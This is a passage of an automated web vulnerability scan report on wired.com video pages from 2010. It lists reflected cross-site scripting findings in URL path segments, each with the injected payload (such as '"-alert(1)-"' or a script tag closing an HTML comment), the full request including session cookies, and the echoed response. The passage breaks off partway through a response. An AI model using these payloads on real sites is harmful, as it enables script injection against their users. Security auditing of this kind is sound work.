Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/lateste61f6"-alert(1)-"a4270526c2e/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:17 GMT
Date: Mon, 22 Nov 2010 00:45:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","1815816633","lateste61f6"-alert(1)-"a4270526c2e","lockheed-shows-off-hulc-exoskeleton-at-asus","652164127001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1176. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed243"><a>ec92b35d5e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latested243"><a>ec92b35d5e4/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:49:14 GMT
Date: Mon, 22 Nov 2010 00:44:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latested243"><a>ec92b35d5e4">
...[SNIP]...

1.1177. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92ffd"-alert(1)-"273e389145b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/181581663392ffd"-alert(1)-"273e389145b/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:50:40 GMT
Date: Mon, 22 Nov 2010 00:45:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","181581663392ffd"-alert(1)-"273e389145b","lockheed-shows-off-hulc-exoskeleton-at-asus","652164127001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1178. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21228"-alert(1)-"b482d416147 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus21228"-alert(1)-"b482d416147/652164127001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:50:56 GMT
Date: Mon, 22 Nov 2010 00:45:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","lockheed-shows-off-hulc-exoskeleton-at-asus21228"-alert(1)-"b482d416147","652164127001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1179. http://www.wired.com/video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc62"-alert(1)-"fa04636625 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/6521641270016cc62"-alert(1)-"fa04636625 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:51:04 GMT
Date: Mon, 22 Nov 2010 00:46:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
ript type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","lockheed-shows-off-hulc-exoskeleton-at-asus","6521641270016cc62"-alert(1)-"fa04636625","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1180. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708ad"><a>a30d5c2b6ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video708ad"><a>a30d5c2b6ec/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29424
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:39 GMT
Date: Mon, 22 Nov 2010 00:35:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video708ad"><a>a30d5c2b6ec ss_latest-videos c_latest">
...[SNIP]...

1.1181. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 68867--><script>alert(1)</script>8206853922a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video68867--><script>alert(1)</script>8206853922a/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29463
Vary: Accept-Encoding
Cache-Control: max-age=277
Expires: Mon, 22 Nov 2010 00:40:56 GMT
Date: Mon, 22 Nov 2010 00:36:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video68867--><script>alert(1)</script>8206853922a/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001
-->
...[SNIP]...

1.1182. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d521e"><a>966c2b1aee3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosd521e"><a>966c2b1aee3/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=287
Expires: Mon, 22 Nov 2010 00:41:20 GMT
Date: Mon, 22 Nov 2010 00:36:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosd521e"><a>966c2b1aee3 c_latest">
...[SNIP]...

1.1183. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54ad4"-alert(1)-"dde8174050c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos54ad4"-alert(1)-"dde8174050c/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:50 GMT
Date: Mon, 22 Nov 2010 00:37:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106777


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "make-drones-almost-invincible","latest-videos54ad4"-alert(1)-"dde8174050c","660704541001","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1184. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6cb4"-alert(1)-"2f4df01e458 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latestb6cb4"-alert(1)-"2f4df01e458/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:43:47 GMT
Date: Mon, 22 Nov 2010 00:38:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "make-drones-almost-invincible","latest-videos","660704541001","latestb6cb4"-alert(1)-"2f4df01e458","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1185. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fd3"><a>5c96c58a517 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest41fd3"><a>5c96c58a517/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:42:44 GMT
Date: Mon, 22 Nov 2010 00:38:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest41fd3"><a>5c96c58a517">
...[SNIP]...

1.1186. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5784"-alert(1)-"7836b725487 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633d5784"-alert(1)-"7836b725487/make-drones-almost-invincible/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 00:44:04 GMT
Date: Mon, 22 Nov 2010 00:39:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "make-drones-almost-invincible","latest-videos","660704541001","latest","1815816633d5784"-alert(1)-"7836b725487","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1187. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55dbc"-alert(1)-"be83cf07536 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/make-drones-almost-invincible55dbc"-alert(1)-"be83cf07536/660704541001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:38 GMT
Date: Mon, 22 Nov 2010 00:39:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","660704541001","latest","make-drones-almost-invincible55dbc"-alert(1)-"be83cf07536","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1188. http://www.wired.com/video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1228f"-alert(1)-"0a46e08cda4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/make-drones-almost-invincible/6607045410011228f"-alert(1)-"0a46e08cda4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
